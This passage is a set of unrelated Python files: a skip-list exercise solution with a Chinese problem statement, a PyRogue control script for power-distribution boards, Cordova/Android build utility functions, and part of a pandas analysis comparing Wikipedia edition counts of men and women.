bool erase(int num): 在跳表中删除一个值,如果 num 不存在,直接返回false. 如果存在多个 num ,删除其中任意一个即可。
了解更多 : https://en.wikipedia.org/wiki/Skip_list
注意,跳表中可能存在多个相同的值,你的代码需要处理这种情况。
样例:
Skiplist skiplist = new Skiplist()
skiplist.add(1)
skiplist.add(2)
skiplist.add(3)
skiplist.search(0) # 返回 false
skiplist.add(4)
skiplist.search(1) # 返回 true
skiplist.erase(0) # 返回 false,0 不在跳表中
skiplist.erase(1) # 返回 true
skiplist.search(1) # 返回 false,1 已被擦除
约束条件:
0 <= num, target <= 20000
最多调用 50000 次 search, add, 以及 erase操作。
'''
'''
思路:使用随机、多级链表实现跳表
使用单向链表节点Node,它有2个指针,next指向同级的下一个节点,down指向下级节点
输入最大是50000次,可以使用16级的索引
为避免插入、删除操作造成2个索引间隔过大,使用randomLevel,50%的几率只在原表中插入,50%几率生成1级索引,25%几率生成2级索引,。。。
'''
class Node:
    """Singly linked skip-list node: ``next`` points along the same level,
    ``down`` points to the corresponding node one level below."""

    def __init__(self, val, next):
        self.val, self.next, self.down = val, next, None


class Skiplist:
    """Classic multi-level skip list built from singly linked Node rows.

    Every level is bounded by a -1 head sentinel and a +inf tail sentinel.
    ``randomLevel`` promotes a new value to height k with probability
    roughly (1/2)**k, giving O(log n) expected search/add/erase.  With 16
    levels this comfortably supports ~10^5 elements; duplicates are allowed.
    """

    def __init__(self):
        self.maxLvl = 16
        # one sentinel pair per level
        self.heads = [Node(-1, Node(float('inf'), None))
                      for _ in range(self.maxLvl)]
        # chain the heads top-to-bottom via their down pointers
        for upper, lower in zip(self.heads, self.heads[1:]):
            upper.down = lower

    def search(self, target: int) -> bool:
        """Return True iff *target* is present."""
        node = self.heads[0]
        for _ in range(self.maxLvl):
            # advance along this level until the next value is >= target
            while node.next.val < target:
                node = node.next
            if node.next.val == target:
                return True
            node = node.down
        return False

    def add(self, num: int) -> None:
        """Insert *num*, promoting it into ``height`` upper index levels."""
        height = self.randomLevel()
        insert_after = []
        node = self.heads[0]
        for level in range(self.maxLvl):
            while node.next.val < num:
                node = node.next
            if (self.maxLvl - level) <= height:
                # this level participates in the new value's column
                insert_after.append(node)
            node = node.down
        # splice a new node into every selected level
        for prev in insert_after:
            prev.next = Node(num, prev.next)
        # wire the down pointers of the freshly inserted column
        for upper, lower in zip(insert_after, insert_after[1:]):
            upper.next.down = lower.next

    def erase(self, num: int) -> bool:
        """Remove one occurrence of *num*; return False if absent."""
        unlink_after = []
        node = self.heads[0]
        for _ in range(self.maxLvl):
            while node.next.val < num:
                node = node.next
            if node.next.val == num:
                # found on this level: remember the predecessor
                unlink_after.append(node)
            node = node.down
        if not unlink_after:
            return False
        for prev in unlink_after:
            prev.next = prev.next.next
        return True

    def randomLevel(self):
        """Geometric height: keep promoting while a fair coin lands heads."""
        import random
        lvl = 1
        for _ in range(self.maxLvl - 1):
            if random.randint(0, 99) % 2:
                lvl += 1
            else:
                break
        return lvl
# Ad-hoc smoke test mirroring the example from the problem statement.
skiplist = Skiplist()
skiplist.add(1)
skiplist.add(2)
skiplist.add(3)
print(skiplist.search(0)) # expect False
skiplist.add(4)
print(skiplist.search(1)) # expect True
print(skiplist.erase(0))  # expect False, 0 is not in the skip list
print(skiplist.erase(1))  # expect True
print(skiplist.search(1)) # expect False, 1 has been erased
|
#!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : PyRogue febBoard Module
#-----------------------------------------------------------------------------
# File : SingleNodeTest.py
# Created : 2016-11-09
# Last update: 2016-11-09
#-----------------------------------------------------------------------------
# Description:
# Rogue interface to FEB board
#-----------------------------------------------------------------------------
# This file is part of the LCLS2-PRL. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the LCLS2-PRL, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import sys
import pyrogue as pr
import pyrogue.gui
import PyQt4.QtGui
import argparse
import Lsst5vDcPdu as board5v
import Lsst24vDcPdu as board24v
import time
# Set the argument parser
parser = argparse.ArgumentParser()

def _str2bool(value):
    """Parse a boolean command-line value.

    Fixes the classic argparse pitfall of ``type=bool``: any non-empty
    string (including "False") is truthy, so ``--hwEmu False`` used to
    enable emulation.  Accepts the usual spellings and rejects the rest.
    """
    if isinstance(value, bool):
        return value
    if value.lower() in ('true', '1', 'yes', 'y'):
        return True
    if value.lower() in ('false', '0', 'no', 'n'):
        return False
    raise argparse.ArgumentTypeError('expected a boolean, got %r' % value)

# Add arguments
parser.add_argument(
    "--type",
    type     = str,
    required = True,
    help     = "board type (5VC, 24VC, 24VD or 48VD)",
)

parser.add_argument(
    "--ip",
    type     = str,
    required = True,
    help     = "IP address",
)

parser.add_argument(
    "--hwEmu",
    type     = _str2bool,
    required = False,
    default  = False,
    help     = "hardware emulation (false=normal operation, true=emulation)",
)

parser.add_argument(
    "--pollEn",
    type     = _str2bool,
    required = False,
    default  = False,
    help     = "enable auto-polling",
)

# Get the arguments
args = parser.parse_args()
# Set base
base = pr.Root(name='base',description='')

# Determine the type: each board variant differs in channel count, shunt
# resistor values and (for the 24V boards) voltage/current scaling.
if ( args.type == '5VC' ):
    # Add Base Device
    base.add(board5v.Top(
        ip        = args.ip,
        nChannels = 20,
        # NOTE(review): the two 10e5 entries look like placeholders for
        # unpopulated/open channels -- confirm against the hardware docs.
        shunts    = (12.8, 12.8, 12.8, 12.8, 12.8, 12.8, 10e5, 10e5, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2),
        hwEmu     = args.hwEmu,
    ))
elif ( args.type == '24VC'):
    # Add Base Device
    base.add(board24v.Top(
        ip        = args.ip,
        hwEmu     = args.hwEmu,
        nChannels = 12,
        shunts    = ( 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4 ),
        VScale    = 0.03973,
        IScale    = 0.0488,
    ))
elif ( args.type == '24VD'):
    # Add Base Device (same scaling as 24VC)
    base.add(board24v.Top(
        ip        = args.ip,
        hwEmu     = args.hwEmu,
        nChannels = 12,
        shunts    = (4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4 ),
        VScale    = 0.03973,
        IScale    = 0.0488,
    ))
elif ( args.type == '48VD'):
    # Add Base Device (48V variant reuses the 24V Top with different scaling)
    base.add(board24v.Top(
        ip        = args.ip,
        hwEmu     = args.hwEmu,
        nChannels = 12,
        shunts    = (4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4 ),
        VScale    = 0.06772,
        IScale    = 0.0282,
    ))
else:
    raise ValueError("Invalid type (%s). Valid types are 5VC, 24VC, 24VD, 48VD" % (args.type) )
# Start the system
base.start(pollEn=args.pollEn)
base.Top.Fpga.Core.AxiVersion.printStatus()

## Create GUI
#appTop = PyQt4.QtGui.QApplication(sys.argv)
#appTop.setStyle('Fusion')
#guiTop = pyrogue.gui.GuiTop(group='rootMesh')
#guiTop.addTree(base)
#guiTop.resize(800, 1000)

base.Top.Fpga.Registers.PowerCycle()

#print("Starting GUI...\n");

# Run GUI
# BUG FIX: the GUI objects above are commented out, so calling
# appTop.exec_() raised NameError at runtime.  Keep it disabled until the
# GUI creation block is re-enabled.
#appTop.exec_()

base.stop()
exit()
|
<filename>scripts/scripting_utils.py
##
## Various util python methods which can be utilized and shared among different scripts
##
import os, shutil, glob, time, sys, platform, subprocess
from distutils.dir_util import copy_tree
def set_log_tag(t):
    """Set the module-global TAG that the debug/error helpers prepend to output."""
    global TAG
    TAG = t
############################################################
### colors for terminal (does not work in Windows... of course)
### ANSI/VT100 escape sequences; CEND resets all attributes.

# reset and text attributes
CEND      = '\033[0m'
CBOLD     = '\33[1m'
CITALIC   = '\33[3m'
CURL      = '\33[4m'
CBLINK    = '\33[5m'
CBLINK2   = '\33[6m'
CSELECTED = '\33[7m'

# standard foreground colors (30-37)
CBLACK  = '\33[30m'
CRED    = '\33[31m'
CGREEN  = '\33[32m'
CYELLOW = '\33[33m'
CBLUE   = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE  = '\33[36m'
CWHITE  = '\33[37m'

# standard background colors (40-47)
CBLACKBG  = '\33[40m'
CREDBG    = '\33[41m'
CGREENBG  = '\33[42m'
CYELLOWBG = '\33[43m'
CBLUEBG   = '\33[44m'
CVIOLETBG = '\33[45m'
CBEIGEBG  = '\33[46m'
CWHITEBG  = '\33[47m'

# bright foreground colors (90-97)
CGREY    = '\33[90m'
CRED2    = '\33[91m'
CGREEN2  = '\33[92m'
CYELLOW2 = '\33[93m'
CBLUE2   = '\33[94m'
CVIOLET2 = '\33[95m'
CBEIGE2  = '\33[96m'
CWHITE2  = '\33[97m'

# bright background colors (100-107)
CGREYBG    = '\33[100m'
CREDBG2    = '\33[101m'
CGREENBG2  = '\33[102m'
CYELLOWBG2 = '\33[103m'
CBLUEBG2   = '\33[104m'
CVIOLETBG2 = '\33[105m'
CBEIGEBG2  = '\33[106m'
CWHITEBG2  = '\33[107m'
############################################################
### file system util methods

def copy_file(sourceFile, destFile):
    """Copy one file to an explicit destination path."""
    debug('copying: {0} -> {1}'.format(sourceFile, destFile))
    shutil.copyfile(sourceFile, destFile)

def copy_files(fileNamePattern, sourceDir, destDir):
    """Copy every file in sourceDir matching the glob pattern into destDir."""
    for match in glob.glob(sourceDir + '/' + fileNamePattern):
        debug('copying: {0} -> {1}'.format(match, destDir))
        shutil.copy(match, destDir)

def copy_dir_contents(sourceDir, destDir):
    """Recursively copy the contents of sourceDir into destDir."""
    copy_tree(sourceDir, destDir)

def remove_files(fileNamePattern, sourceDir, log=True):
    """Delete every file in sourceDir matching the glob pattern."""
    for match in glob.glob(sourceDir + '/' + fileNamePattern):
        if log:
            debug('deleting: ' + match)
        os.remove(match)

def rename_file(fileNamePattern, newFileName, sourceDir):
    """Rename each matching file to newFileName (later matches overwrite)."""
    for match in glob.glob(sourceDir + '/' + fileNamePattern):
        debug('rename: {0} -> {1}'.format(match, newFileName))
        os.rename(match, sourceDir + '/' + newFileName)

def remove_dir_if_exists(path):
    """Delete a directory tree when present; otherwise just log."""
    if not os.path.exists(path):
        debug('cannot delete {0}. dir does not exist'.format(path))
        return
    debug('deleting dir: ' + path)
    shutil.rmtree(path)

def remove_file_if_exists(path):
    """Delete a single file when present; otherwise just log."""
    if not os.path.exists(path):
        debug('cannot delete {0}. file does not exist'.format(path))
        return
    debug('deleting: ' + path)
    os.remove(path)

def clear_dir(dir):
    """Empty an existing directory by deleting and recreating it."""
    shutil.rmtree(dir)
    os.mkdir(dir)

def recreate_dir(dir):
    """Ensure dir exists and is empty (parent directory must exist)."""
    if os.path.exists(dir):
        shutil.rmtree(dir)
    os.mkdir(dir)

def create_dir_if_not_exist(dir):
    """Create dir (including any parents) unless it already exists."""
    if not os.path.exists(dir):
        os.makedirs(dir)
############################################################
### debug messages util methods

def debug(msg):
    """Print an INFO line; bold prefix on POSIX terminals, plain on Windows."""
    if is_windows():
        print(('* [{0}][INFO]: {1}').format(TAG, msg))
    else:
        print(('{0}* [{1}][INFO]:{2} {3}').format(CBOLD, TAG, CEND, msg))

def debug_green(msg):
    """Print an INFO line with the message in green (plain on Windows)."""
    if is_windows():
        print(('* [{0}][INFO]: {1}').format(TAG, msg))
    else:
        print(('{0}* [{1}][INFO]:{2} {3}{4}{5}').format(CBOLD, TAG, CEND, CGREEN, msg, CEND))

def debug_blue(msg):
    """Print an INFO line with the message in blue (plain on Windows)."""
    if is_windows():
        print(('* [{0}][INFO]: {1}').format(TAG, msg))
    else:
        print(('{0}* [{1}][INFO]:{2} {3}{4}{5}').format(CBOLD, TAG, CEND, CBLUE, msg, CEND))

def error(msg, do_exit=False):
    """Print an ERROR line (red on POSIX) and optionally terminate the script."""
    if is_windows():
        print(('* [{0}][ERROR]: {1}').format(TAG, msg))
    else:
        print(('{0}* [{1}][ERROR]:{2} {3}{4}{5}').format(CBOLD, TAG, CEND, CRED, msg, CEND))
    if do_exit:
        exit()
############################################################
### util

def check_submodule_dir(platform, submodule_dir):
    """Abort with an error message when a git submodule dir is missing or empty.

    NOTE(review): the 'platform' parameter shadows the imported platform
    module inside this function (harmless here, but worth renaming).
    """
    if os.path.isdir(submodule_dir) and os.listdir(submodule_dir):
        return
    error('Submodule [{0}] folder empty. Did you forget to run >> git submodule update --init --recursive << ?'.format(platform))
    exit()
def is_windows():
    """Return True when running on a Windows host."""
    return platform.system().lower() == 'windows'
# https://stackoverflow.com/questions/17140886/how-to-search-and-replace-text-in-a-file-using-python
def replace_text_in_file(file_path, substring, replace_with):
    """Replace every occurrence of *substring* in the file, in place."""
    with open(file_path, 'r') as handle:
        contents = handle.read()
    with open(file_path, 'w') as handle:
        handle.write(contents.replace(substring, replace_with))
def execute_command(cmd_params, log=True):
    """Run an external command (argv list), optionally logging it first."""
    if log:
        debug_blue('Executing: ' + str(cmd_params))
    subprocess.call(cmd_params)
def change_dir(dir):
    """Chdir wrapper kept for call-site readability in the build scripts."""
    os.chdir(dir)
def xcode_build(target, configuration='Release'):
    """Clean-build an Xcode target using the legacy build system."""
    execute_command(['xcodebuild', '-target', target, '-configuration', configuration, 'clean', 'build', '-UseModernBuildSystem=NO'])

def adb_uninstall(package):
    """Uninstall an Android package from the connected device."""
    execute_command(['adb', 'uninstall', package])

def adb_install_apk(path):
    """(Re)install an APK on the connected device."""
    execute_command(['adb', 'install', '-r', path])

def adb_shell(app_package):
    """Launch an app on the device via the monkey tool."""
    execute_command(['adb', 'shell', 'monkey', '-p', app_package, '1'])

def gradle_make_release_jar():
    """Build the release core JAR via Gradle."""
    execute_command(['./gradlew', 'adjustCoreJarRelease'])

def gradle_make_debug_jar():
    """Build the debug core JAR via Gradle."""
    execute_command(['./gradlew', 'adjustCoreJarDebug'])

def gradle_run(options):
    """Run Gradle with an arbitrary iterable of options."""
    execute_command(['./gradlew'] + list(options))
############################################################
### cordova specific

def _remove_platforms():
    """Drop both cordova platforms from the current app directory."""
    debug_green('Removing platforms ...')
    cordova_remove_platform('android')
    cordova_remove_platform('ios')

def clean_test_app(root_dir):
    """Remove SDK plugins and platforms from the example app directory.

    NOTE(review): despite its name this cleans ``<root>/example`` while
    clean_example_app cleans ``<root>/test/app`` -- the two names look
    swapped; confirm intent before renaming.
    """
    example_dir = '{0}/example'.format(root_dir)
    sdk_name = 'com.adjust.sdk'
    adjust_sdk_plugin_dir = '{0}/plugins/com.adjust.sdk'.format(example_dir)
    debug_green('Removing cordova plugins ...')
    os.chdir(example_dir)
    for plugin in (sdk_name,
                   'cordova-plugin-console',
                   'cordova-plugin-customurlscheme',
                   'cordova-plugin-dialogs',
                   'cordova-plugin-whitelist',
                   'cordova-plugin-device',
                   'cordova-universal-links-plugin'):
        subprocess.call(['cordova', 'plugin', 'rm', plugin])
    remove_dir_if_exists(adjust_sdk_plugin_dir)
    _remove_platforms()

def clean_example_app(root_dir):
    """Remove SDK/test plugins and platforms from the test app directory.

    NOTE(review): operates on ``<root>/test/app`` -- see clean_test_app.
    """
    test_dir = '{0}/test/app'.format(root_dir)
    sdk_name = 'com.adjust.sdk'
    test_plugin_name = 'com.adjust.test'
    adjust_sdk_plugin_dir = '{0}/plugins/com.adjust.sdk'.format(test_dir)
    adjust_sdk_test_plugin_dir = '{0}/plugins/com.adjust.test'.format(test_dir)
    debug_green('Removing cordova plugins ...')
    os.chdir(test_dir)
    for plugin in (sdk_name, test_plugin_name):
        subprocess.call(['cordova', 'plugin', 'rm', plugin])
    remove_dir_if_exists(adjust_sdk_plugin_dir)
    remove_dir_if_exists(adjust_sdk_test_plugin_dir)
    _remove_platforms()

def cordova_add_plugin(plugin_name, options=None):
    """cordova plugin add <name> [options]."""
    cmd_params = ['cordova', 'plugin', 'add', plugin_name]
    if options is not None:
        cmd_params.extend(options)
    execute_command(cmd_params)

def cordova_remove_plugin(plugin_name):
    """cordova plugin remove <name>."""
    execute_command(['cordova', 'plugin', 'remove', plugin_name])

def cordova_build(platform, options=None):
    """cordova build <platform> [options]."""
    cmd_params = ['cordova', 'build', platform]
    if options is not None:
        cmd_params.extend(options)
    execute_command(cmd_params)

def cordova_run(platform):
    """cordova run <platform>."""
    execute_command(['cordova', 'run', platform])

def cordova_add_platform(platform):
    """cordova platform add <platform>."""
    execute_command(['cordova', 'platform', 'add', platform])

def cordova_remove_platform(platform):
    """cordova platform remove <platform>."""
    execute_command(['cordova', 'platform', 'remove', platform])
|
from __future__ import print_function
__author__ = '<NAME>'
import pandas as pd
import numpy as np
from scipy.stats import itemfreq
import scipy.stats as stats
import util as ut
import pylab as plt
import os
import statsmodels.api as sm
class GlobalWikipediaPopularity:
    """
    Compares the global notability of men and women in Wikipedia, using the
    number of language editions in which an article exists as a proxy for
    notability.

    NOTE(review): this module carries several Python-2 / legacy-library
    idioms (``file()``, ``Series.order()``, ``scipy.stats.itemfreq``,
    ``DataFrame.append``) that fail on modern Python/pandas/scipy; they are
    flagged inline below.
    """

    def __init__(self, datapath, start, end):
        """Load the people CSV; optionally restrict to birth years in (start, end].

        Pass start = end = -1 to keep everyone.
        """
        self.people = pd.read_csv(datapath, delimiter=",", header=0)
        print ("total num people %s"%len(self.people.index))
        print (" num people not in EN %s"%len(self.people[(self.people.available_english == False)].index))
        # keep only rows with a known, plausible birth year
        self.people = self.people[~pd.isnull(self.people.birth_year) & (self.people.birth_year <= 2015)]
        # Create 'decade' and 'century' column
        self.people['birth_decade'] = np.round(np.floor((self.people['birth_year']/10))*10)
        self.people['birth_century'] = np.round(np.floor((self.people['birth_year']/100))*100)
        # pre/post are embedded in all output file names
        self.pre = ""
        self.post = ""
        if start >= 0 and end >= 0:
            self.pre = str(start)
            self.post = str(end)
            recent_people = self.people[(self.people.birth_year > start) & (self.people.birth_year <= end)]
            self.people = recent_people
            print ("num people born between %s and %s century %s "%(start, end, len(self.people.index)))
            print ("num people born between %s and %s century %s "%(start, end, len(recent_people.index)))
            # NOTE(review): 'year' is not defined in this scope -- it relies
            # on the module-level 'year' set in __main__ and raises
            # NameError if the class is used standalone with start/end >= 0.
            print ("num people for which gender is available AND they are born between %s and 2015: %s "
                   %(year, len( recent_people[(recent_people.gender == "male") | (recent_people.gender == "female")])))
        # NOTE(review): file() is Python 2 only; under Python 3 use open().
        self.logfile = file("img/results-numlang"+self.pre+"-"+self.post+".txt", "w+")

    def genderBoxplots(self, women, men, labels, path):
        """Save two box plots of edition counts per gender: with and without outliers."""
        data = [women.edition_count.values, men.edition_count.values]
        plt.figure()
        plt.boxplot(data)
        # mark the mean
        means = [np.mean(x) for x in data]
        print (means)
        plt.scatter(range(1, len(data)+1), means, color="red", marker=">", s=20)
        plt.ylabel('num editions')
        plt.xticks(range(1, len(data)+1), labels)
        plt.savefig(path+'/numeditions_gender_box_withOutlier'+self.pre+"-"+self.post+'.png', bbox_inches="tight")
        plt.figure()
        plt.boxplot(data, sym='')  # sym='' suppresses the outlier fliers
        # mark the mean
        means = [np.mean(x) for x in data]
        print (means)
        plt.scatter(range(1, len(data)+1), means, color="red", marker=">", s=20)
        plt.ylabel('num editions')
        plt.xticks(range(1, len(data)+1), labels)
        plt.savefig(path+'/numeditions_gender_box'+self.pre+"-"+self.post+'.png', bbox_inches="tight")

    def analyze_numlangedition_per_decade(self):
        """Compare mean edition counts per gender across birth decades:
        one coarse 0-1000 bucket, then 10-year buckets up to 2015."""
        interval = 10
        decade = 1000
        #decades_of_interest = np.arange(0, 2010, interval)
        # NOTE(review): DataFrame.append was removed in pandas >= 2.0.
        res = pd.DataFrame(columns = ('class', 'mean-men', "sem-men", 'mean-women', 'sem-women'))
        #for decade in decades_of_interest:
        print (self.people.shape)
        print (self.people.head(n=1))
        #print (self.people[(self.people.birth_year < 1000) & (self.people.birth_year > 0)].shape)
        people = self.people[(self.people.birth_year < decade) & (self.people.birth_year >= 0 )]
        print (people.shape)
        resdict = self.analyze_num_lang_edition("0-1000", people)
        res = res.append(resdict, ignore_index = True)
        while (decade < 2015):
            end = decade+interval
            people = self.people[(self.people.birth_year >= decade) & (self.people.birth_year < end)]
            print (decade)
            print (decade+interval)
            print (people.shape)
            resdict = self.analyze_num_lang_edition(str(decade)+"-"+str(end), people)
            res = res.append(resdict, ignore_index = True)
            decade = end
        ut.plot_shaded_lines(res["class"].values, res["mean-women"].values, res["mean-men"].values, res["sem-women"].values, res["sem-women"].values, 'Mean Num Editions', 'Birth Year',
                             'img/numedition_gender_deacdes'+self.pre+"-"+self.post+'.png')

    def analyze_numlangedition_per_profession(self):
        """Compare mean edition counts per gender for each dbpedia class."""
        classes = self.people["class"].unique()
        print (self.people["class"].nunique())
        #print classes
        res = pd.DataFrame(columns = ('class', 'mean-men', "sem-men", 'mean-women', 'sem-women'))
        for pclass in classes:
            people = self.people[self.people["class"] == pclass]
            print (pclass)
            # last URI segment is the human-readable class name
            classname = pclass.split("/")[-1]
            print (classname)
            resdict = self.analyze_num_lang_edition(classname, people)
            res = res.append(resdict, ignore_index = True)
        ut.plot_shaded_lines(res["class"].values, res["mean-women"].values, res["mean-men"].values, res["sem-women"].values, res["sem-women"].values, 'mean num editions', 'professions', 'img/numedition_gender_deacdes.png')

    def get_ratio(self, female, male, normalize):
        """Male/female frequency ratio per edition count.

        *female* / *male* are itemfreq-style 2-column arrays of
        (edition_count, frequency).  Returns {edition_count: male/female},
        skipping counts with no female entry.  With normalize=True the
        frequencies are first divided by the per-gender totals.
        """
        female_frequency_sorted = female[:, 1]
        female_numedition_sorted = female[:,0]
        male_frequency_sorted = male[:, 1]
        male_numedition_sorted = male[:,0]
        female_max = np.max(female_numedition_sorted)
        male_max = np.max(male_numedition_sorted)
        # NOTE(review): shadows the builtin max()
        max = np.max([female_max, male_max])
        male_sum = np.sum(male_frequency_sorted.item(ind) for ind in range(0, len(male_frequency_sorted)))
        female_sum = np.sum(female_frequency_sorted.item(ind) for ind in range(0, len(female_frequency_sorted)))
        ratio = {}
        for i in range(1, max):
            ind = np.where(male_numedition_sorted == i)
            #print (ind)
            # NOTE(review): np.where returns a tuple, so "ind > 0" and the
            # len(...) expression below look fragile -- confirm they behave
            # as intended on the numpy version in use.
            if (ind > 0 and len(male_frequency_sorted[ind] == 1)):
                if normalize:
                    male_val = male_frequency_sorted.item(ind) / float(male_sum)
                else:
                    male_val = male_frequency_sorted.item(ind)
            else:
                male_val = 0
            ind_f = np.where(female_numedition_sorted == i)
            if(ind_f > 0 and len(female_frequency_sorted[ind_f]) == 1):
                if normalize:
                    female_val = female_frequency_sorted.item(ind_f) / float(female_sum)
                else:
                    female_val = female_frequency_sorted.item(ind_f)
                ratio[i] = male_val/float(female_val)
            #else:
            #    ratio.append(male_val/female_val)
        return ratio

    def analyze_num_lang_edition(self, classname, people):
        """Full per-group analysis.

        Writes summary statistics to the logfile and saves percentage
        plots, box plots, male/female ratio plots (with a shuffled-gender
        random baseline) and CCDFs under img/<classname>.  Returns a dict
        of per-gender mean/median/sem of edition_count.
        """
        path = "img/"+classname
        men = people[people.gender =="male"]
        women = people[people.gender =="female"]
        #create folder if not exist
        if not os.path.exists(path):
            os.makedirs(path)
        self.logfile.write("\n\n\n\ "+classname+"\n")
        edition_counts = np.append(women.edition_count.values, men.edition_count.values)
        labels = ['female ('+str(len(women.index))+')', 'male ('+str(len(men.index))+')']
        #print edition_counts
        # (Mann-Whitney U relates to the probability that a score randomly
        # drawn from population A will be greater than a score randomly
        # drawn from population B.)
        max_num_editions = np.max(edition_counts)
        #print max_num_editions
        top_men = []
        men_percentage = 0
        topk = range(10, 110, 10)
        if (men.shape[0] > 0):
            men_percentage = [men[men.edition_count == x].shape[0]/float(men.shape[0]) for x in range(1, max_num_editions)]
            self.logfile.write("\n % of local men ")
            self.logfile.write(str(men[men.edition_count <2].shape[0]/float(men.shape[0])))
            self.logfile.write("\n percentage men %s"%str(len(men.index)/float((len(women.index)+len(men.index)))))
            # NOTE(review): Series.order() was removed in pandas 0.17+
            # (use sort_values()).
            men_vals = men.edition_count.order(ascending=True).values
        women_percentage = 0
        if (women.shape[0] > 0):
            women_percentage = [women[women.edition_count == x].shape[0]/float(women.shape[0]) for x in range(1, max_num_editions)]
            self.logfile.write("\n\n % local women ")
            self.logfile.write(str(women[women.edition_count < 2].shape[0]/float(women.shape[0])))
            self.logfile.write("\n percentage women %s"%str(len(women.index)/float((len(women.index)+len(men.index)))))
            women_vals = women.edition_count.order(ascending=True).values
        if (women.shape[0] > 0 and men.shape[0] > 0):
            j_m = 0
            j_w = 0
            U, p = stats.mstats.mannwhitneyu(women.edition_count, men.edition_count)
            ut.write_mannwithneyu(U, p, women.edition_count, men.edition_count, self.logfile)
            #for i in topk:
            #    perc_men = len(men.edition_count.index) * i/100.0
            #    print "bottom %s percent of men are %s - mean %s - median %s"% (str(i), str(perc_men), np.mean(men_vals[:int(perc_men)]), np.median(men_vals[:int(perc_men)]))
            #    top_men.append(men_vals[:int(perc_men)])
            #    perc_women = len(women.edition_count.index) * i/100.0
            #    print "bottom %s percent of women are %s - mean %s - median %s"% (str(i), str(perc_women), np.mean(women_vals[:int(perc_men)]), np.median(women_vals[:int(perc_men)]))
            #    top_women.append(women_vals[:int(perc_women)])
            #    j_m += int(perc_men)
            #    j_w += int(perc_women)
            #ut.plotTopk(top_women, top_men, ['pink', 'blue'], topk, path+'/numedition_gender_topk.png')
            ut.plot_percentage(women_percentage, men_percentage, ['pink', 'blue'], range(1, max_num_editions), path+'/numedition_gender_percentage'+self.pre+"-"+self.post+'.png')
        self.genderBoxplots(women, men, labels, path)
        self.logfile.write("\n\n num women %s"%len(women.index))
        self.logfile.write("\n num men %s"%len(men.index))
        data = [women.edition_count.values, men.edition_count.values]
        # Compute the qth percentile of women and men
        q75 = [np.percentile(x, q=75) for x in data]
        self.logfile.write("\n third quartil (75th percentile): "+str(q75))
        q95 = [np.percentile(x, q=95) for x in data]
        self.logfile.write("\n 95th percentile: "+str(q95))
        q99 = [np.percentile(x, q=99) for x in data]
        self.logfile.write("\n 99th percentile: "+str(q99))
        q99_women = q99[0]
        q99_men = q99[1]
        self.logfile.write("\n threshold women 99th percentile: %s"%q99_women)
        self.logfile.write("\n threshold men 99th percentile: %s"%q99_men)
        # redo the percentage plot truncated at the smaller 99th percentile
        men_percentage = 0
        th = np.min(q99)
        if (men.shape[0] > 0):
            men_percentage = [men[men.edition_count == x].shape[0]/float(men.shape[0]) for x in range(1, int(th))]
        women_percentage = 0
        if (women.shape[0] > 0):
            women_percentage = [women[women.edition_count == x].shape[0]/float(women.shape[0]) for x in range(1, int(th))]
        ut.plot_percentage(women_percentage, men_percentage, ['pink', 'blue'], range(1, int(th)), path+'/numedition_gender_percentage'+self.pre+"-"+self.post+'_99.png')
        # RANDOM BASELINE FOR RATIO: shuffle gender labels 999 times
        fake_ratios_norm = list()
        fake_ratios = list()
        for i in range(1, 1000):
            #print (people.gender.value_counts())
            people["random_gender"] = pd.Series(np.random.permutation(people.gender.values), index=people.index)
            #print (people.random_gender.value_counts())
            fake_men = people[people.random_gender =="male"]
            fake_women = people[people.random_gender =="female"]
            # NOTE(review): scipy.stats.itemfreq was removed in SciPy 1.3
            # (use np.unique(..., return_counts=True)).
            item_frequency_fake_female = itemfreq(np.array(fake_women['edition_count'].values.tolist()))
            item_frequency_fake_male = itemfreq(np.array(fake_men['edition_count'].values.tolist()))
            fake_ratios_norm.append(self.get_ratio(item_frequency_fake_female, item_frequency_fake_male, True))
            # NOTE(review): both baselines use normalize=True; the second
            # call presumably should pass False -- confirm.
            fake_ratios.append(self.get_ratio(item_frequency_fake_female, item_frequency_fake_male, True))
        item_frequency_female = itemfreq(np.array(women['edition_count'].values.tolist()))
        item_frequency_male = itemfreq(np.array(men['edition_count'].values.tolist()))
        ratio_norm = self.get_ratio(item_frequency_female, item_frequency_male, True)
        # average the shuffled baselines per edition count
        mean_fake_ratio_norm = {}
        mean_fake_ratio = {}
        for key in ratio_norm.keys():
            vals = []
            vals_norm = []
            for dic1 in fake_ratios_norm:
                if key in dic1:
                    vals_norm.append(dic1.get(key))
            mean_fake_ratio_norm[key] = np.mean(vals_norm)
            for dic2 in fake_ratios:
                if key in dic2:
                    vals.append(dic2.get(key))
            mean_fake_ratio[key] = np.mean(vals)
        # if we plot the normalized ratio we should take the log, since otherwise the upper bound is 0 but the ratio can become extremely small.
        #ut.plotratio(ratio_norm, mean_fake_ratio_norm, ['g','r--'], ['empirical gender', 'random gender'], self.pre+"-"+self.post, path+'/numedition_gender_ratio'+self.pre+"-"+self.post+'_norm.png', 'Num Editions', 'Male Proportion/Female Proportion', False, False)
        ratio = self.get_ratio(item_frequency_female, item_frequency_male, False)
        # NOTE(review): under Python 3 the dict views should be wrapped in
        # list() before being handed to lowess.
        lowess = sm.nonparametric.lowess(ratio.values(), ratio.keys(), frac=0.1)
        ut.plotratio(ratio, lowess, mean_fake_ratio, ['b^','g', 'r--'], ['empirical gender', 'lowess fit', 'random gender'], self.pre+"-"+self.post, path+'/numedition_gender_ratio'+self.pre+"-"+self.post+'.png', 'Num Editions', 'Male/Female', False, False)
        #ratio = self.get_ratio(item_frequency_female, item_frequency_male, True)
        #ut.plotline(list(ratio.keys()), list(ratio.values()), ['pink','blue'], path+'/numedition_gender_ratio'+self.pre+'_norm.png', 'Num Editions', 'Female-Male-Ratio', False, False)
        #ratio = self.get_ratio(item_frequency_female, item_frequency_male, False)
        #ut.plotline(list(ratio.keys()), list(ratio.values()), ['pink','blue'], path+'/numedition_gender_ratio'+self.pre+'.png', 'Num Editions', 'Female-Male-Ratio', False, False)
